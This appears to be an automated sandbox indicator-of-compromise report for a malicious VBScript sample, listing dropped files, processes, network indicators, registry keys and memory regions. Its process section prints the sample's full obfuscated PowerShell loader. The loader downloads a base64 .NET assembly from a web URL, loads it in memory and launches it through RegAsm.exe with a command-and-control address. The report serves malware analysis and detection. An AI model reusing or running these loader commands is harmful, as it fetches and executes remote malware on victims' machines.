IOC Report
5fKvwnCAeC.vbs

loading gif

Files

File Path
Type
Category
Malicious
5fKvwnCAeC.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2amsj435.g4p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1fn0441.lbk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcnlpz4b.zmu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedqkmkm.5pl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\loat\logs.dat
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://45.90.89.123/2117/RMCCF.txt
45.90.89.123
malicious
45.90.89.98
malicious
http://geoplugin.net/json.gp
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gp/C
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://ia600100.us.arX
unknown
https://ia600100.us.archive.org
unknown
http://45.90.89.123
unknown
https://aka.ms/pscore68
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Content
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ia600100.us.archive.org
207.241.227.240

IPs

IP
Domain
Country
Malicious
45.90.89.123
unknown
Bulgaria
malicious
45.90.89.98
unknown
Bulgaria
malicious
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
114B000
heap
page read and write
malicious
26F3DE40000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
26F3D897000
trusted library allocation
page read and write
malicious
26F45F00000
trusted library section
page read and write
malicious
7FF7C0EA0000
trusted library allocation
page read and write
1F509ADA000
heap
page read and write
1F509B74000
heap
page read and write
759BF3B000
stack
page read and write
1EB02AD3000
heap
page read and write
7FF7C0F10000
trusted library allocation
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
7FF7C0F04000
trusted library allocation
page read and write
1EB03177000
trusted library allocation
page read and write
1F509B55000
heap
page read and write
7FF7C0ED0000
trusted library allocation
page read and write
7FF7C0DE0000
trusted library allocation
page read and write
1F509AC4000
heap
page read and write
26F2EE8A000
trusted library allocation
page read and write
1F509B74000
heap
page read and write
759BBB7000
stack
page read and write
1EB00C90000
heap
page read and write
1F509AAB000
heap
page read and write
26F45A04000
heap
page read and write
759B9FE000
stack
page read and write
1F509ABA000
heap
page read and write
5BBE27E000
stack
page read and write
1F509C1A000
heap
page read and write
7FF7C0D2A000
trusted library allocation
page read and write
BC2EBFE000
stack
page read and write
1F509AA1000
heap
page read and write
759BD3F000
stack
page read and write
2AA0000
heap
page read and write
1EB00BB8000
heap
page read and write
7FF7C0C26000
trusted library allocation
page read and write
26F45990000
heap
page read and write
1F509AB8000
heap
page read and write
26F2D8A0000
trusted library allocation
page read and write
1F509B37000
heap
page read and write
759BC3C000
stack
page read and write
1EB02AD0000
heap
page read and write
26F2D290000
trusted library allocation
page read and write
1F509B1F000
heap
page read and write
7FF7C0C26000
trusted library allocation
page read and write
7FF7C0C2C000
trusted library allocation
page execute and read and write
12BE000
stack
page read and write
1EB024F0000
heap
page readonly
1F509C4B000
heap
page read and write
7FF7C0DF0000
trusted library allocation
page read and write
5BBE9BE000
stack
page read and write
26F2D821000
trusted library allocation
page read and write
1F509AA5000
heap
page read and write
26F2B8C9000
heap
page read and write
1EB02BA6000
heap
page read and write
1F509C3B000
heap
page read and write
1F509B50000
heap
page read and write
7FF7C0E80000
trusted library allocation
page read and write
5BBE63E000
stack
page read and write
26F3DB20000
trusted library allocation
page read and write
759B5EE000
stack
page read and write
1F509B5A000
heap
page read and write
759C90E000
stack
page read and write
26F2DE7A000
trusted library allocation
page read and write
5BBE3FC000
stack
page read and write
1EB025B0000
heap
page read and write
1F509B24000
heap
page read and write
7FF7C0E90000
trusted library allocation
page read and write
26F3EDAF000
trusted library allocation
page read and write
1EB02CCA000
trusted library allocation
page read and write
1F507CE0000
heap
page read and write
7FF7C0D30000
trusted library allocation
page execute and read and write
26F2EF0E000
trusted library allocation
page read and write
7FF7C0E10000
trusted library allocation
page read and write
7FF7C0D52000
trusted library allocation
page read and write
1EB0310A000
trusted library allocation
page read and write
1F509C31000
heap
page read and write
1EB00C66000
heap
page read and write
7FF7C0B8B000
trusted library allocation
page read and write
5BBE47E000
stack
page read and write
1EB02CA1000
trusted library allocation
page read and write
F30000
heap
page read and write
7FF7C0D12000
trusted library allocation
page read and write
1F509AA0000
heap
page read and write
26F45930000
heap
page execute and read and write
7FF7C0B74000
trusted library allocation
page read and write
26F2B870000
heap
page read and write
1F509AEB000
heap
page read and write
7FF7C0D70000
trusted library allocation
page read and write
26F2F186000
trusted library allocation
page read and write
26F45985000
heap
page read and write
26F45BC0000
heap
page read and write
7FF7C0D60000
trusted library allocation
page execute and read and write
26F2B860000
heap
page read and write
BC2F0FE000
stack
page read and write
7FF7C0F13000
trusted library allocation
page read and write
7FF7C0E80000
trusted library allocation
page read and write
26F2DE26000
trusted library allocation
page read and write
7FF7C0C90000
trusted library allocation
page execute and read and write
1EB00B70000
heap
page read and write
759BB3E000
stack
page read and write
1EB02BAC000
heap
page read and write
1F509ACE000
heap
page read and write
10DE000
stack
page read and write
474000
remote allocation
page execute and read and write
1EB02B1A000
heap
page read and write
1F507B4E000
heap
page read and write
26F2BA90000
heap
page read and write
26F2D6F0000
heap
page read and write
26F45C34000
heap
page read and write
1F509AB3000
heap
page read and write
1EB03240000
trusted library allocation
page read and write
1EB025B6000
heap
page read and write
5BBE738000
stack
page read and write
5BBE7BB000
stack
page read and write
26F45973000
heap
page read and write
7FF7C0F08000
trusted library allocation
page read and write
759B97F000
stack
page read and write
26F2DE72000
trusted library allocation
page read and write
BC2F2FB000
stack
page read and write
5BBE2FE000
stack
page read and write
5BBE73E000
stack
page read and write
7FF7C0E20000
trusted library allocation
page read and write
7FF7C0DB0000
trusted library allocation
page read and write
26F2EF2E000
trusted library allocation
page read and write
7FF7C0B7D000
trusted library allocation
page execute and read and write
1F509AB0000
heap
page read and write
1F507B38000
heap
page read and write
1EB02D5A000
trusted library allocation
page read and write
1F509B75000
heap
page read and write
1F509C4B000
heap
page read and write
127C000
stack
page read and write
1F507B9F000
heap
page read and write
1F509C11000
heap
page read and write
1F509AD3000
heap
page read and write
1F509C4B000
heap
page read and write
7FF7C0B73000
trusted library allocation
page execute and read and write
1F509B74000
heap
page read and write
5BBE5F9000
stack
page read and write
1EB02D99000
trusted library allocation
page read and write
26F45940000
heap
page read and write
7FF7C0D52000
trusted library allocation
page read and write
759BDBF000
stack
page read and write
7FF7C0E30000
trusted library allocation
page read and write
1F509C2E000
heap
page read and write
EFC000
stack
page read and write
1F509B74000
heap
page read and write
1F509C4B000
heap
page read and write
1EB00B79000
heap
page read and write
1EB12C4F000
trusted library allocation
page read and write
26F2EF21000
trusted library allocation
page read and write
1F509AAE000
heap
page read and write
111C000
stack
page read and write
759B8FD000
stack
page read and write
26F4598D000
heap
page read and write
7FF7C0D90000
trusted library allocation
page read and write
1F509B3C000
heap
page read and write
7FF7C0DB0000
trusted library allocation
page read and write
1F509B74000
heap
page read and write
7FF7C0DC0000
trusted library allocation
page read and write
1140000
heap
page read and write
1F509ACB000
heap
page read and write
7FF7C0C56000
trusted library allocation
page execute and read and write
1F509ADF000
heap
page read and write
1EB00BFC000
heap
page read and write
1EB00C70000
heap
page read and write
26F2B8FE000
heap
page read and write
26F2D670000
heap
page read and write
7DF4526C0000
trusted library allocation
page execute and read and write
5BBEA3B000
stack
page read and write
1EB00E50000
heap
page read and write
1EB02D40000
trusted library allocation
page read and write
1EB00C58000
heap
page read and write
7FF7C0D40000
trusted library allocation
page execute and read and write
759C98D000
stack
page read and write
1F507AE0000
heap
page read and write
1F509AC7000
heap
page read and write
1F509AC4000
heap
page read and write
1F509B74000
heap
page read and write
7FF7C0B7D000
trusted library allocation
page execute and read and write
5BBE83F000
stack
page read and write
5BBE8BE000
stack
page read and write
1EB02570000
trusted library allocation
page read and write
2F8F000
stack
page read and write
1EB12CB6000
trusted library allocation
page read and write
7FF7C0EC0000
trusted library allocation
page read and write
26F2B904000
heap
page read and write
1F509ABF000
heap
page read and write
BC2E9FF000
stack
page read and write
26F2EF56000
trusted library allocation
page read and write
1EB12C41000
trusted library allocation
page read and write
1F507DE5000
heap
page read and write
26F2EF0A000
trusted library allocation
page read and write
1F509BA0000
heap
page read and write
7FF7C0D40000
trusted library allocation
page execute and read and write
26F45BF0000
heap
page read and write
1EB02AC6000
heap
page execute and read and write
26F3D821000
trusted library allocation
page read and write
1EB02D9F000
trusted library allocation
page read and write
7FF7C0E50000
trusted library allocation
page read and write
7FF7C0DD0000
trusted library allocation
page read and write
7FF7C0C30000
trusted library allocation
page execute and read and write
1F509C13000
heap
page read and write
1F507B10000
heap
page read and write
1EB03138000
trusted library allocation
page read and write
1F509C3C000
heap
page read and write
26F2DC46000
trusted library allocation
page read and write
1EB030E2000
trusted library allocation
page read and write
1F509B74000
heap
page read and write
26F45BC6000
heap
page read and write
26F2B900000
heap
page read and write
1EB00B83000
heap
page read and write
1F507B94000
heap
page read and write
26F2B945000
heap
page read and write
1F509AFF000
heap
page read and write
1EB024C0000
trusted library allocation
page read and write
5BBE6B6000
stack
page read and write
1EB02C30000
heap
page execute and read and write
1F509B61000
heap
page read and write
7FF7C0D30000
trusted library allocation
page execute and read and write
7FF7C0DA0000
trusted library allocation
page read and write
1EB00BBE000
heap
page read and write
7FF7C0E90000
trusted library allocation
page read and write
1F509AA2000
heap
page read and write
759BE3E000
stack
page read and write
1F509C0E000
heap
page read and write
1F509B16000
heap
page read and write
7FF7C0C20000
trusted library allocation
page read and write
1F509AA6000
heap
page read and write
26F3E840000
trusted library allocation
page read and write
759BCB8000
stack
page read and write
308F000
stack
page read and write
BBC000
stack
page read and write
1EB1ADB0000
heap
page read and write
1EB00BB0000
heap
page read and write
2A90000
heap
page read and write
1F509B74000
heap
page read and write
7FF7C0D80000
trusted library allocation
page read and write
26F45BB0000
heap
page read and write
26F45C1A000
heap
page read and write
7FF7C0DA0000
trusted library allocation
page read and write
1EB02FC8000
trusted library allocation
page read and write
26F2B90C000
heap
page read and write
7FF7C0D90000
trusted library allocation
page read and write
7FF7C0C90000
trusted library allocation
page execute and read and write
5BBDFE3000
stack
page read and write
1EB02C5B000
trusted library allocation
page read and write
26F45900000
heap
page execute and read and write
7FF7C0D80000
trusted library allocation
page read and write
7FF7C0E40000
trusted library allocation
page read and write
1F509C64000
heap
page read and write
1F509AA4000
heap
page read and write
7FF7C0B70000
trusted library allocation
page read and write
1F509AE6000
heap
page read and write
1F509C26000
heap
page read and write
1F507C0D000
heap
page read and write
1F509B5C000
heap
page read and write
FC0000
heap
page read and write
1EB02480000
heap
page read and write
26F45BC8000
heap
page read and write
1F509B1C000
heap
page read and write
759B56E000
stack
page read and write
BC2E5BA000
stack
page read and write
7FF7C0D70000
trusted library allocation
page read and write
7FF7C0E50000
trusted library allocation
page read and write
1EB00C69000
heap
page read and write
1F507AD0000
heap
page read and write
26F2D810000
heap
page execute and read and write
BC2EEFE000
stack
page read and write
7FF7C0E00000
trusted library allocation
page read and write
7FF7C0B72000
trusted library allocation
page read and write
1F509B48000
heap
page read and write
1EB024E0000
trusted library allocation
page read and write
26F2D6B0000
trusted library allocation
page read and write
7FF7C0EF1000
trusted library allocation
page read and write
BC2F1FE000
stack
page read and write
26F45BF9000
heap
page read and write
26F45C36000
heap
page read and write
26F2D2B0000
trusted library allocation
page read and write
1F509AA5000
heap
page read and write
7FF7C0B80000
trusted library allocation
page read and write
1F509CA1000
heap
page read and write
478000
remote allocation
page execute and read and write
7FF7C0C20000
trusted library allocation
page read and write
7FF7C0C2C000
trusted library allocation
page execute and read and write
26F2B908000
heap
page read and write
1F509B2B000
heap
page read and write
1EB00A90000
heap
page read and write
F9E000
stack
page read and write
7FF7C0C56000
trusted library allocation
page execute and read and write
7FF7C0B73000
trusted library allocation
page execute and read and write
1F509AA2000
heap
page read and write
F20000
heap
page read and write
26F2F52C000
trusted library allocation
page read and write
5BBE37F000
stack
page read and write
26F45A24000
heap
page read and write
1F509AC2000
heap
page read and write
FA0000
heap
page read and write
26F2EF32000
trusted library allocation
page read and write
26F2D250000
heap
page read and write
1F509CA0000
heap
page read and write
7FF7C0E60000
trusted library allocation
page read and write
26F45A40000
heap
page read and write
1F509AE7000
heap
page read and write
26F3E8D9000
trusted library allocation
page read and write
7FF7C0DC0000
trusted library allocation
page read and write
7FF7C0C30000
trusted library allocation
page execute and read and write
2C8F000
stack
page read and write
2D8F000
stack
page read and write
1F509B1B000
heap
page read and write
1F509C27000
heap
page read and write
26F45937000
heap
page execute and read and write
7FF7C0DE0000
trusted library allocation
page read and write
1EB02D54000
trusted library allocation
page read and write
26F2D620000
trusted library allocation
page read and write
1EB02D57000
trusted library allocation
page read and write
1F509C3C000
heap
page read and write
26F2D2D6000
heap
page read and write
26F2E87A000
trusted library allocation
page read and write
7FF7C0E40000
trusted library allocation
page read and write
1F509AAE000
heap
page read and write
1F507BE5000
heap
page read and write
1F509B74000
heap
page read and write
5BBE57E000
stack
page read and write
1EB02C41000
trusted library allocation
page read and write
26F2D680000
trusted library allocation
page read and write
1F509AF2000
heap
page read and write
1F509C11000
heap
page read and write
1EB03132000
trusted library allocation
page read and write
26F3DB12000
trusted library allocation
page read and write
7FF7C0E10000
trusted library allocation
page read and write
1EB02A30000
heap
page read and write
1F509C16000
heap
page read and write
26F2D2C0000
heap
page readonly
26F2B91E000
heap
page read and write
FC5000
heap
page read and write
12E0000
heap
page read and write
7FF7C0DD0000
trusted library allocation
page read and write
1F509ACE000
heap
page read and write
1F509D2D000
heap
page read and write
1F509AA3000
heap
page read and write
26F2F527000
trusted library allocation
page read and write
1F509B30000
heap
page read and write
26F45C0C000
heap
page read and write
7FF7C0D2A000
trusted library allocation
page read and write
7FF7C0B74000
trusted library allocation
page read and write
1F509B43000
heap
page read and write
1F509B1F000
heap
page read and write
1F509660000
heap
page read and write
7FF7C0D10000
trusted library allocation
page read and write
759B87F000
stack
page read and write
26F2DC1E000
trusted library allocation
page read and write
26F2DC22000
trusted library allocation
page read and write
BC2EFFE000
stack
page read and write
1F507DE0000
heap
page read and write
1F507C0E000
heap
page read and write
1EB00C04000
heap
page read and write
1EB02D3D000
trusted library allocation
page read and write
1F509B02000
heap
page read and write
5BBE4FE000
stack
page read and write
7FF7C0E30000
trusted library allocation
page read and write
1EB00E55000
heap
page read and write
759B4E3000
stack
page read and write
7FF7C0E70000
trusted library allocation
page read and write
BC2E8FE000
stack
page read and write
7FF7C0E70000
trusted library allocation
page read and write
1F509B13000
heap
page read and write
7FF7C0D21000
trusted library allocation
page read and write
759BAF9000
stack
page read and write
26F45C0E000
heap
page read and write
1F509B4B000
heap
page read and write
26F2D2D0000
heap
page read and write
1EB1ACD0000
heap
page read and write
7FF7C0F20000
trusted library allocation
page read and write
1F507BE5000
heap
page read and write
26F2DA42000
trusted library allocation
page read and write
26F2F1E1000
trusted library allocation
page read and write
7FF7C0D21000
trusted library allocation
page read and write
7FF7C0EB0000
trusted library allocation
page read and write
7FF7C0DF0000
trusted library allocation
page read and write
1F509AC4000
heap
page read and write
1EB00BD0000
heap
page read and write
1EB02D43000
trusted library allocation
page read and write
1EB00BC0000
heap
page read and write
1EB02AC0000
heap
page execute and read and write
26F2DC4A000
trusted library allocation
page read and write
BC2ECFF000
stack
page read and write
1F509B74000
heap
page read and write
26F2F2D0000
trusted library allocation
page read and write
7FF7C0E00000
trusted library allocation
page read and write
7FF7C0B80000
trusted library allocation
page read and write
2E8F000
stack
page read and write
1EB03254000
trusted library allocation
page read and write
26F2B8A0000
heap
page read and write
1F509AEF000
heap
page read and write
1F507B37000
heap
page read and write
26F2F15A000
trusted library allocation
page read and write
1EB1B0A0000
heap
page read and write
26F2DC11000
trusted library allocation
page read and write
26F3D830000
trusted library allocation
page read and write
1EB0324A000
trusted library allocation
page read and write
1EB02D4B000
trusted library allocation
page read and write
759BA7E000
stack
page read and write
1F509AA9000
heap
page read and write
26F2B8A5000
heap
page read and write
1F509BA1000
heap
page read and write
26F2DC05000
trusted library allocation
page read and write
1F509B74000
heap
page read and write
26F4594B000
heap
page read and write
26F2D6B2000
trusted library allocation
page read and write
1EB02BD0000
heap
page execute and read and write
1F509AAB000
heap
page read and write
26F2F462000
trusted library allocation
page read and write
1F509C0D000
heap
page read and write
1EB02BC3000
heap
page read and write
7FF7C0D60000
trusted library allocation
page execute and read and write
26F45A60000
heap
page read and write
26F2B8C0000
heap
page read and write
1EB02B72000
heap
page read and write
26F2DE48000
trusted library allocation
page read and write
7FF7C0E20000
trusted library allocation
page read and write
759BEBE000
stack
page read and write
7FF7C0E60000
trusted library allocation
page read and write
1EB00BF8000
heap
page read and write
There are 413 hidden memdumps, click here to show them.